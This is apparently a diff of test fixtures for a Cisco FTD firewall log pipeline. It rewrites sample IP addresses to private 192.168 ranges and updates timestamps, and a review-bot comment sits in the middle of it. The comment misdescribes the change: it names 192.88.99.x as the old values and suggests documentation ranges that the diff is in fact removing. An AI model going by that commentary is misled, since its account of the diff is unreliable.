+Jan 14 2015 13:16:14: %FTD-4-338008: Dynamic Filter dropped blacklisted TCP traffic from inside:10.1.1.1/33340 (10.2.1.1/33340) to outsidet:192.168.2.223/80 (192.168.2.223/8080), destination 192.168.2.223 resolved from dynamic list: 192.168.2.223/255.255.255.255, threat-level: very-high, category: Malware
+Nov 16 2009 14:12:35: %FTD-5-304001: 10.30.30.30 Accessed URL 192.168.2.1:/app
+Nov 16 2009 14:12:36: %FTD-5-304001: 10.5.111.32 Accessed URL 192.168.2.32:http://example.com
+Nov 16 2009 14:12:37: %FTD-5-304002: Access denied URL http://www.example.net/images/favicon.ico SRC 10.69.6.39 DEST 192.168.0.19 on interface inside
diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-sample.log-expected.json b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-sample.log-expected.json
index 7949728e22e..df048d88373 100644
--- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-sample.log-expected.json
+++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-sample.log-expected.json
@@ -6,8 +6,8 @@
 },
 "destination": {
 "port": 53,
- "address": "192.0.0.8",
- "ip": "192.0.0.8"
+ "address": "192.168.0.8",
+ "ip": "192.168.0.8"
 },
 "source": {
 "port": 63016,
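Review bot: After this hunk every address on the `outside` interface in test-sample.log sits in RFC 1918 space (192.168.0.x, 192.168.2.x, 192.168.99.x), so this sample set no longer contains a single public IP and, as far as the diff shows, the pipeline's geo/AS enrichment is exercised only by the one 81.2.69.144 event in test-not-ip.log, while the regenerated expectations here only swap addresses in `destination.ip`, `source.ip`, `related.ip` and the NAT fields. Consider keeping one outside-side address on a supported test-database IP, e.g. turning `+Apr 30 2013 09:23:40: %FTD-4-106023: Deny tcp src outside:192.168.2.126/53638 dst inside:10.0.0.132/8111 ...` into `... src outside:81.2.69.144/53638 ...`, so that a 106023 deny with a public source gets `source.geo`/`source.as` coverage in this file as well. Putting private addresses on the `outside` interface also makes these firewall samples read as if the WAN were a LAN; if the tooling that motivated the change tolerates the RFC 5737 documentation ranges where no enrichment is expected, those would keep the samples realistic without risking a collision with a real network, though that tolerance cannot be confirmed from this diff. The previous 192.88.99.x values belonged to the retired 6to4 anycast prefix, so moving away from them is itself reasonable.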
@@ -43,13 +43,13 @@ "related": { "ip": [ "10.1.2.30", - "192.0.0.8" + "192.168.0.8" ] }, "event": { "severity": 4, - "ingested": "2021-09-07T12:22:01.768609600Z", - "original": "Apr 15 2013 09:36:50: %FTD-4-106023: Deny tcp src dmz:10.1.2.30/63016 dst outside:192.0.0.8/53 by access-group \"acl_dmz\" [0xe3aab522, 0x0]", + "ingested": "2021-12-09T13:35:10.982940200Z", + "original": "Apr 15 2013 09:36:50: %FTD-4-106023: Deny tcp src dmz:10.1.2.30/63016 dst outside:192.168.0.8/53 by access-group \"acl_dmz\" [0xe3aab522, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -76,8 +76,8 @@ }, "destination": { "port": 53, - "address": "192.0.0.8", - "ip": "192.0.0.8" + "address": "192.168.0.8", + "ip": "192.168.0.8" }, "source": { "port": 63016, @@ -113,13 +113,13 @@ "related": { "ip": [ "10.1.2.30", - "192.0.0.8" + "192.168.0.8" ] }, "event": { "severity": 4, - "ingested": "2021-09-07T12:22:01.768617500Z", - "original": "Apr 15 2013 09:36:50: %FTD-4-106023: Deny tcp src dmz:10.1.2.30/63016 dst outside:192.0.0.8/53 type 3, code 0, by access-group \"acl_dmz\" [0xe3aab522, 0x0]", + "ingested": "2021-12-09T13:35:10.982948100Z", + "original": "Apr 15 2013 09:36:50: %FTD-4-106023: Deny tcp src dmz:10.1.2.30/63016 dst outside:192.168.0.8/53 type 3, code 0, by access-group \"acl_dmz\" [0xe3aab522, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -146,8 +146,8 @@ }, "destination": { "port": 2000, - "address": "192.0.0.89", - "ip": "192.0.0.89" + "address": "192.168.0.89", + "ip": "192.168.0.89" }, "source": { "port": 2241, 
@@ -183,13 +183,13 @@ "related": { "ip": [ "10.1.2.16", - "192.0.0.89" + "192.168.0.89" ] }, "event": { "severity": 5, - "ingested": "2021-09-07T12:22:01.768619600Z", - "original": "Apr 15 2014 09:34:34 EDT: %FTD-session-5-106100: access-list acl_in permitted tcp inside/10.1.2.16(2241) -\u003e outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:35:10.982952400Z", + "original": "Apr 15 2014 09:34:34 EDT: %FTD-session-5-106100: access-list acl_in permitted tcp inside/10.1.2.16(2241) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -217,8 +217,8 @@ }, "destination": { "port": 53, - "address": "192.0.2.10", - "ip": "192.0.2.10" + "address": "192.168.2.10", + "ip": "192.168.2.10" }, "source": { "port": 1039, @@ -258,7 +258,7 @@ ], "ip": [ "172.29.2.101", - "192.0.2.10" + "192.168.2.10" ] }, "host": { @@ -266,8 +266,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:22:01.768631600Z", - "original": "Apr 24 2013 16:00:28 INT-FW01 : %FTD-6-106100: access-list inside denied udp inside/172.29.2.101(1039) -\u003e outside/192.0.2.10(53) hit-cnt 1 first hit [0xd820e56a, 0x0]", + "ingested": "2021-12-09T13:35:10.982957300Z", + "original": "Apr 24 2013 16:00:28 INT-FW01 : %FTD-6-106100: access-list inside denied udp inside/172.29.2.101(1039) -\u003e outside/192.168.2.10(53) hit-cnt 1 first hit [0xd820e56a, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -294,8 +294,8 @@ }, "destination": { "port": 53, - "address": "192.0.2.57", - "ip": "192.0.2.57" + "address": "192.168.2.57", + "ip": "192.168.2.57" }, "source": { "port": 1065, @@ -335,7 +335,7 @@ ], "ip": [ "172.29.2.3", - "192.0.2.57" + "192.168.2.57" ] }, "host": { 
@@ -343,8 +343,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:22:01.768634600Z", - "original": "Apr 24 2013 16:00:27 INT-FW01 : %FTD-6-106100: access-list inside permitted udp inside/172.29.2.3(1065) -\u003e outside/192.0.2.57(53) hit-cnt 144 300-second interval [0xe982c7a4, 0x0]", + "ingested": "2021-12-09T13:35:10.982961300Z", + "original": "Apr 24 2013 16:00:27 INT-FW01 : %FTD-6-106100: access-list inside permitted udp inside/172.29.2.3(1065) -\u003e outside/192.168.2.57(53) hit-cnt 144 300-second interval [0xe982c7a4, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -371,8 +371,8 @@ }, "destination": { "port": 12834, - "address": "192.0.2.130", - "ip": "192.0.2.130" + "address": "192.168.2.130", + "ip": "192.168.2.130" }, "source": { "port": 4952, @@ -408,13 +408,13 @@ "related": { "ip": [ "10.123.3.42", - "192.0.2.130" + "192.168.2.130" ] }, "event": { "severity": 6, - "ingested": "2021-09-07T12:22:01.768636600Z", - "original": "Apr 29 2013 12:59:50: %FTD-6-305011: Built dynamic TCP translation from outside:10.123.3.42/4952 to outside:192.0.2.130/12834", + "ingested": "2021-12-09T13:35:10.982966100Z", + "original": "Apr 29 2013 12:59:50: %FTD-6-305011: Built dynamic TCP translation from outside:10.123.3.42/4952 to outside:192.168.2.130/12834", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -446,8 +446,8 @@ }, "source": { "port": 443, - "address": "192.0.2.43", - "ip": "192.0.2.43" + "address": "192.168.2.43", + "ip": "192.168.2.43" }, "tags": [ "preserve_original_event" 
@@ -478,14 +478,14 @@ }, "related": { "ip": [ - "192.0.2.43", + "192.168.2.43", "10.123.3.42" ] }, "event": { "severity": 6, - "ingested": "2021-09-07T12:22:01.768638300Z", - "original": "Apr 29 2013 12:59:50: %FTD-6-302013: Built outbound TCP connection 89743274 for outside:192.0.2.43/443 (192.0.2.43/443) to outside:10.123.3.42/4952 (10.123.3.42/12834)", + "ingested": "2021-12-09T13:35:10.982970800Z", + "original": "Apr 29 2013 12:59:50: %FTD-6-302013: Built outbound TCP connection 89743274 for outside:192.168.2.43/443 (192.168.2.43/443) to outside:10.123.3.42/4952 (10.123.3.42/12834)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -501,7 +501,7 @@ "destination_interface": "outside", "mapped_source_port": 443, "mapped_destination_ip": "10.123.3.42", - "mapped_source_ip": "192.0.2.43", + "mapped_source_ip": "192.168.2.43", "connection_id": "89743274", "source_interface": "outside", "mapped_destination_port": 12834 @@ -514,8 +514,8 @@ }, "destination": { "port": 25882, - "address": "192.0.2.130", - "ip": "192.0.2.130" + "address": "192.168.2.130", + "ip": "192.168.2.130" }, "source": { "port": 52925, @@ -551,13 +551,13 @@ "related": { "ip": [ "10.123.1.35", - "192.0.2.130" + "192.168.2.130" ] }, "event": { "severity": 6, - "ingested": "2021-09-07T12:22:01.768640Z", - "original": "Apr 29 2013 12:59:50: %FTD-6-305011: Built dynamic UDP translation from outside:10.123.1.35/52925 to outside:192.0.2.130/25882", + "ingested": "2021-12-09T13:35:10.982975200Z", + "original": "Apr 29 2013 12:59:50: %FTD-6-305011: Built dynamic UDP translation from outside:10.123.1.35/52925 to outside:192.168.2.130/25882", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -589,11 +589,11 @@ }, "source": { "nat": { - "ip": "192.0.2.43" + "ip": "192.168.2.43" }, - "address": "192.0.2.222", + "address": "192.168.2.222", "port": 53, - "ip": "192.0.2.222" + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" 
@@ -624,15 +624,15 @@ }, "related": { "ip": [ - "192.0.2.222", - "192.0.2.43", + "192.168.2.222", + "192.168.2.43", "10.123.1.35" ] }, "event": { "severity": 6, - "ingested": "2021-09-07T12:22:01.768641600Z", - "original": "Apr 29 2013 12:59:50: %FTD-6-302015: Built outbound UDP connection 89743275 for outside:192.0.2.222/53 (192.0.2.43/53) to outside:10.123.1.35/52925 (10.123.1.35/25882)", + "ingested": "2021-12-09T13:35:10.982979800Z", + "original": "Apr 29 2013 12:59:50: %FTD-6-302015: Built outbound UDP connection 89743275 for outside:192.168.2.222/53 (192.168.2.43/53) to outside:10.123.1.35/52925 (10.123.1.35/25882)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -648,7 +648,7 @@ "destination_interface": "outside", "mapped_source_port": 53, "mapped_destination_ip": "10.123.1.35", - "mapped_source_ip": "192.0.2.43", + "mapped_source_ip": "192.168.2.43", "connection_id": "89743275", "source_interface": "outside", "mapped_destination_port": 25882 @@ -661,8 +661,8 @@ }, "destination": { "port": 45392, - "address": "192.0.2.130", - "ip": "192.0.2.130" + "address": "192.168.2.130", + "ip": "192.168.2.130" }, "source": { "port": 4953, @@ -698,13 +698,13 @@ "related": { "ip": [ "10.123.3.42", - "192.0.2.130" + "192.168.2.130" ] }, "event": { "severity": 6, - "ingested": "2021-09-07T12:22:01.768643100Z", - "original": "Apr 29 2013 12:59:50: %FTD-6-305011: Built dynamic TCP translation from outside:10.123.3.42/4953 to outside:192.0.2.130/45392", + "ingested": "2021-12-09T13:35:10.982985400Z", + "original": "Apr 29 2013 12:59:50: %FTD-6-305011: Built dynamic TCP translation from outside:10.123.3.42/4953 to outside:192.168.2.130/45392", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -737,8 +737,8 @@ }, "source": { "port": 80, - "address": "192.0.2.1", - "ip": "192.0.2.1" + "address": "192.168.2.1", + "ip": "192.168.2.1" }, "tags": [ "preserve_original_event" 
@@ -769,15 +769,15 @@ }, "related": { "ip": [ - "192.0.2.1", + "192.168.2.1", "10.123.3.42", "10.123.3.130" ] }, "event": { "severity": 6, - "ingested": "2021-09-07T12:22:01.768644600Z", - "original": "Apr 29 2013 12:59:50: %FTD-6-302013: Built outbound TCP connection 89743276 for outside:192.0.2.1/80 (192.0.2.1/80) to outside:10.123.3.42/4953 (10.123.3.130/45392)", + "ingested": "2021-12-09T13:35:10.982989800Z", + "original": "Apr 29 2013 12:59:50: %FTD-6-302013: Built outbound TCP connection 89743276 for outside:192.168.2.1/80 (192.168.2.1/80) to outside:10.123.3.42/4953 (10.123.3.130/45392)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -793,7 +793,7 @@ "destination_interface": "outside", "mapped_source_port": 80, "mapped_destination_ip": "10.123.3.130", - "mapped_source_ip": "192.0.2.1", + "mapped_source_ip": "192.168.2.1", "connection_id": "89743276", "source_interface": "outside", "mapped_destination_port": 45392 @@ -811,8 +811,8 @@ }, "source": { "port": 53, - "address": "192.0.2.222", - "ip": "192.0.2.222" + "address": "192.168.2.222", + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" @@ -843,15 +843,15 @@ }, "related": { "ip": [ - "192.0.2.222", + "192.168.2.222", "10.123.1.35" ] }, "event": { "severity": 6, "duration": 5025000000000, - "ingested": "2021-09-07T12:22:01.768646700Z", - "original": "Apr 29 2013 12:59:50: %FTD-6-302016: Teardown UDP connection 89743275 for outside:192.0.2.222/53 to inside:10.123.1.35/52925 duration 1:23:45 bytes 140", + "ingested": "2021-12-09T13:35:10.982994800Z", + "original": "Apr 29 2013 12:59:50: %FTD-6-302016: Teardown UDP connection 89743275 for outside:192.168.2.222/53 to inside:10.123.1.35/52925 duration 1:23:45 bytes 140", "code": "302016", "kind": "event", "start": "2013-04-29T11:36:05.000Z", @@ -884,8 +884,8 @@ }, "source": { "port": 53, - "address": "192.0.2.222", - "ip": "192.0.2.222" + "address": "192.168.2.222", + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" 
@@ -916,15 +916,15 @@ }, "related": { "ip": [ - "192.0.2.222", + "192.168.2.222", "10.123.1.35" ] }, "event": { "severity": 6, "duration": 36000000000000, - "ingested": "2021-09-07T12:22:01.768648200Z", - "original": "Apr 29 2013 12:59:50: %FTD-6-302016: Teardown UDP connection 666 for outside:192.0.2.222/53 user1 to inside:10.123.1.35/52925 user2 duration 10:00:00 bytes 9999999", + "ingested": "2021-12-09T13:35:10.983000700Z", + "original": "Apr 29 2013 12:59:50: %FTD-6-302016: Teardown UDP connection 666 for outside:192.168.2.222/53 user1 to inside:10.123.1.35/52925 user2 duration 10:00:00 bytes 9999999", "code": "302016", "kind": "event", "start": "2013-04-29T02:59:50.000Z", @@ -991,7 +991,7 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:22:01.768649800Z", + "ingested": "2021-12-09T13:35:10.983041400Z", "original": "Jun 04 2011 21:59:52 FJSG2NRFW01 : %FTD-6-302021: Teardown ICMP connection for faddr 172.24.177.29/0 gaddr 192.168.132.46/17233 laddr 192.168.132.46/17233", "code": "302021", "kind": "event", @@ -1016,8 +1016,8 @@ }, "destination": { "port": 10879, - "address": "192.0.0.130", - "ip": "192.0.0.130" + "address": "192.168.0.130", + "ip": "192.168.0.130" }, "source": { "port": 4954, @@ -1053,13 +1053,13 @@ "related": { "ip": [ "192.168.3.42", - "192.0.0.130" + "192.168.0.130" ] }, "event": { "severity": 6, - "ingested": "2021-09-07T12:22:01.768651800Z", - "original": "Apr 29 2013 12:59:50: %FTD-6-305011: Built dynamic TCP translation from inside:192.168.3.42/4954 to outside:192.0.0.130/10879", + "ingested": "2021-12-09T13:35:10.983045400Z", + "original": "Apr 29 2013 12:59:50: %FTD-6-305011: Built dynamic TCP translation from inside:192.168.3.42/4954 to outside:192.168.0.130/10879", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -1092,8 +1092,8 @@ }, "source": { "port": 80, - "address": "192.0.0.17", - "ip": "192.0.0.17" + "address": "192.168.0.17", + "ip": "192.168.0.17" }, "tags": [ "preserve_original_event" 
@@ -1124,15 +1124,15 @@ }, "related": { "ip": [ - "192.0.0.17", + "192.168.0.17", "192.168.3.42", "10.0.0.130" ] }, "event": { "severity": 6, - "ingested": "2021-09-07T12:22:01.768653300Z", - "original": "Apr 29 2013 12:59:50: %FTD-6-302013: Built outbound TCP connection 89743277 for outside:192.0.0.17/80 (192.0.0.17/80) to inside:192.168.3.42/4954 (10.0.0.130/10879)", + "ingested": "2021-12-09T13:35:10.983049400Z", + "original": "Apr 29 2013 12:59:50: %FTD-6-302013: Built outbound TCP connection 89743277 for outside:192.168.0.17/80 (192.168.0.17/80) to inside:192.168.3.42/4954 (10.0.0.130/10879)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -1148,7 +1148,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "10.0.0.130", - "mapped_source_ip": "192.0.0.17", + "mapped_source_ip": "192.168.0.17", "connection_id": "89743277", "source_interface": "outside", "mapped_destination_port": 10879 @@ -1166,8 +1166,8 @@ }, "source": { "port": 12981, - "address": "192.0.0.66", - "ip": "192.0.0.66" + "address": "192.168.0.66", + "ip": "192.168.0.66" }, "tags": [ "preserve_original_event" @@ -1189,14 +1189,14 @@ }, "related": { "ip": [ - "192.0.0.66", + "192.168.0.66", "10.1.2.60" ] }, "event": { "severity": 2, - "ingested": "2021-09-07T12:22:01.768654900Z", - "original": "Apr 30 2013 09:22:33: %FTD-2-106007: Deny inbound UDP from 192.0.0.66/12981 to 10.1.2.60/53 due to DNS Query", + "ingested": "2021-12-09T13:35:10.983053600Z", + "original": "Apr 30 2013 09:22:33: %FTD-2-106007: Deny inbound UDP from 192.168.0.66/12981 to 10.1.2.60/53 due to DNS Query", "code": "106007", "kind": "event", "action": "firewall-rule", @@ -1219,8 +1219,8 @@ }, "destination": { "port": 2000, - "address": "192.0.0.89", - "ip": "192.0.0.89" + "address": "192.168.0.89", + "ip": "192.168.0.89" }, "source": { "port": 2006, 
@@ -1256,13 +1256,13 @@ "related": { "ip": [ "10.0.0.16", - "192.0.0.89" + "192.168.0.89" ] }, "event": { "severity": 5, - "ingested": "2021-09-07T12:22:01.768657500Z", - "original": "Apr 30 2013 09:22:38: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2006) -\u003e outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:35:10.983057300Z", + "original": "Apr 30 2013 09:22:38: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2006) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -1289,8 +1289,8 @@ }, "destination": { "port": 40443, - "address": "192.0.0.88", - "ip": "192.0.0.88" + "address": "192.168.0.88", + "ip": "192.168.0.88" }, "source": { "port": 49734, @@ -1326,13 +1326,13 @@ "related": { "ip": [ "10.0.0.46", - "192.0.0.88" + "192.168.0.88" ] }, "event": { "severity": 5, - "ingested": "2021-09-07T12:22:01.768659100Z", - "original": "Apr 30 2013 09:22:38: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49734) -\u003e outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:35:10.983062Z", + "original": "Apr 30 2013 09:22:38: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49734) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -1359,8 +1359,8 @@ }, "destination": { "port": 40443, - "address": "192.0.0.88", - "ip": "192.0.0.88" + "address": "192.168.0.88", + "ip": "192.168.0.88" }, "source": { "port": 49735, 
@@ -1396,13 +1396,13 @@ "related": { "ip": [ "10.0.0.46", - "192.0.0.88" + "192.168.0.88" ] }, "event": { "severity": 5, - "ingested": "2021-09-07T12:22:01.768660700Z", - "original": "Apr 30 2013 09:22:39: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49735) -\u003e outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:35:10.983067500Z", + "original": "Apr 30 2013 09:22:39: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49735) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -1429,8 +1429,8 @@ }, "destination": { "port": 40443, - "address": "192.0.0.88", - "ip": "192.0.0.88" + "address": "192.168.0.88", + "ip": "192.168.0.88" }, "source": { "port": 49736, @@ -1466,13 +1466,13 @@ "related": { "ip": [ "10.0.0.46", - "192.0.0.88" + "192.168.0.88" ] }, "event": { "severity": 5, - "ingested": "2021-09-07T12:22:01.768662300Z", - "original": "Apr 30 2013 09:22:39: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49736) -\u003e outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:35:10.983071Z", + "original": "Apr 30 2013 09:22:39: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49736) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -1499,8 +1499,8 @@ }, "destination": { "port": 40443, - "address": "192.0.0.88", - "ip": "192.0.0.88" + "address": "192.168.0.88", + "ip": "192.168.0.88" }, "source": { "port": 49737, 
@@ -1536,13 +1536,13 @@ "related": { "ip": [ "10.0.0.46", - "192.0.0.88" + "192.168.0.88" ] }, "event": { "severity": 5, - "ingested": "2021-09-07T12:22:01.768663800Z", - "original": "Apr 30 2013 09:22:39: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49737) -\u003e outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:35:10.983075700Z", + "original": "Apr 30 2013 09:22:39: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49737) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -1569,8 +1569,8 @@ }, "destination": { "port": 40443, - "address": "192.0.0.88", - "ip": "192.0.0.88" + "address": "192.168.0.88", + "ip": "192.168.0.88" }, "source": { "port": 49738, @@ -1606,13 +1606,13 @@ "related": { "ip": [ "10.0.0.46", - "192.0.0.88" + "192.168.0.88" ] }, "event": { "severity": 5, - "ingested": "2021-09-07T12:22:01.768665400Z", - "original": "Apr 30 2013 09:22:40: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49738) -\u003e outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:35:10.983081Z", + "original": "Apr 30 2013 09:22:40: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49738) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -1639,8 +1639,8 @@ }, "destination": { "port": 40443, - "address": "192.0.0.88", - "ip": "192.0.0.88" + "address": "192.168.0.88", + "ip": "192.168.0.88" }, "source": { "port": 49746, 
@@ -1676,13 +1676,13 @@ "related": { "ip": [ "10.0.0.46", - "192.0.0.88" + "192.168.0.88" ] }, "event": { "severity": 5, - "ingested": "2021-09-07T12:22:01.768667400Z", - "original": "Apr 30 2013 09:22:41: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49746) -\u003e outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:35:10.983085900Z", + "original": "Apr 30 2013 09:22:41: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49746) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -1709,8 +1709,8 @@ }, "destination": { "port": 2000, - "address": "192.0.0.89", - "ip": "192.0.0.89" + "address": "192.168.0.89", + "ip": "192.168.0.89" }, "source": { "port": 2007, @@ -1746,13 +1746,13 @@ "related": { "ip": [ "10.0.0.16", - "192.0.0.89" + "192.168.0.89" ] }, "event": { "severity": 5, - "ingested": "2021-09-07T12:22:01.768669Z", - "original": "Apr 30 2013 09:22:47: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2007) -\u003e outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:35:10.983089800Z", + "original": "Apr 30 2013 09:22:47: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2007) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -1821,7 +1821,7 @@ }, "event": { "severity": 5, - "ingested": "2021-09-07T12:22:01.768670600Z", + "ingested": "2021-12-09T13:35:10.983094600Z", "original": "Apr 30 2013 09:22:48: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.13(43013) -\u003e dmz/192.168.33.31(25) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", 
@@ -1849,8 +1849,8 @@ }, "destination": { "port": 2000, - "address": "192.0.0.89", - "ip": "192.0.0.89" + "address": "192.168.0.89", + "ip": "192.168.0.89" }, "source": { "port": 2008, @@ -1886,13 +1886,13 @@ "related": { "ip": [ "10.0.0.16", - "192.0.0.89" + "192.168.0.89" ] }, "event": { "severity": 5, - "ingested": "2021-09-07T12:22:01.768672200Z", - "original": "Apr 30 2013 09:22:56: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2008) -\u003e outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:35:10.983100300Z", + "original": "Apr 30 2013 09:22:56: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2008) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -1924,8 +1924,8 @@ }, "source": { "port": 137, - "address": "192.0.2.66", - "ip": "192.0.2.66" + "address": "192.168.2.66", + "ip": "192.168.2.66" }, "tags": [ "preserve_original_event" @@ -1951,14 +1951,14 @@ }, "related": { "ip": [ - "192.0.2.66", + "192.168.2.66", "10.1.2.42" ] }, "event": { "severity": 2, - "ingested": "2021-09-07T12:22:01.768673700Z", - "original": "Apr 30 2013 09:23:02: %FTD-2-106006: Deny inbound UDP from 192.0.2.66/137 to 10.1.2.42/137 on interface inside", + "ingested": "2021-12-09T13:35:10.983104800Z", + "original": "Apr 30 2013 09:23:02: %FTD-2-106006: Deny inbound UDP from 192.168.2.66/137 to 10.1.2.42/137 on interface inside", "code": "106006", "kind": "event", "action": "firewall-rule", @@ -1988,8 +1988,8 @@ }, "source": { "port": 12981, - "address": "192.0.2.66", - "ip": "192.0.2.66" + "address": "192.168.2.66", + "ip": "192.168.2.66" }, "tags": [ "preserve_original_event" 
@@ -2011,14 +2011,14 @@ }, "related": { "ip": [ - "192.0.2.66", + "192.168.2.66", "10.1.5.60" ] }, "event": { "severity": 2, - "ingested": "2021-09-07T12:22:01.768675300Z", - "original": "Apr 30 2013 09:23:03: %FTD-2-106007: Deny inbound UDP from 192.0.2.66/12981 to 10.1.5.60/53 due to DNS Query", + "ingested": "2021-12-09T13:35:10.983108400Z", + "original": "Apr 30 2013 09:23:03: %FTD-2-106007: Deny inbound UDP from 192.168.2.66/12981 to 10.1.5.60/53 due to DNS Query", "code": "106007", "kind": "event", "action": "firewall-rule", @@ -2041,8 +2041,8 @@ }, "destination": { "port": 2000, - "address": "192.0.0.89", - "ip": "192.0.0.89" + "address": "192.168.0.89", + "ip": "192.168.0.89" }, "source": { "port": 2009, @@ -2078,13 +2078,13 @@ "related": { "ip": [ "10.0.0.16", - "192.0.0.89" + "192.168.0.89" ] }, "event": { "severity": 5, - "ingested": "2021-09-07T12:22:01.768677200Z", - "original": "Apr 30 2013 09:23:06: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2009) -\u003e outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:35:10.983112900Z", + "original": "Apr 30 2013 09:23:06: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2009) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -2111,8 +2111,8 @@ }, "destination": { "port": 40443, - "address": "192.0.0.88", - "ip": "192.0.0.88" + "address": "192.168.0.88", + "ip": "192.168.0.88" }, "source": { "port": 49776, 
@@ -2148,13 +2148,13 @@ "related": { "ip": [ "10.0.0.46", - "192.0.0.88" + "192.168.0.88" ] }, "event": { "severity": 5, - "ingested": "2021-09-07T12:22:01.768678800Z", - "original": "Apr 30 2013 09:23:08: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49776) -\u003e outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:35:10.983117Z", + "original": "Apr 30 2013 09:23:08: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49776) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -2181,8 +2181,8 @@ }, "destination": { "port": 2000, - "address": "192.0.0.89", - "ip": "192.0.0.89" + "address": "192.168.0.89", + "ip": "192.168.0.89" }, "source": { "port": 2010, @@ -2218,13 +2218,13 @@ "related": { "ip": [ "10.0.0.16", - "192.0.0.89" + "192.168.0.89" ] }, "event": { "severity": 5, - "ingested": "2021-09-07T12:22:01.768680400Z", - "original": "Apr 30 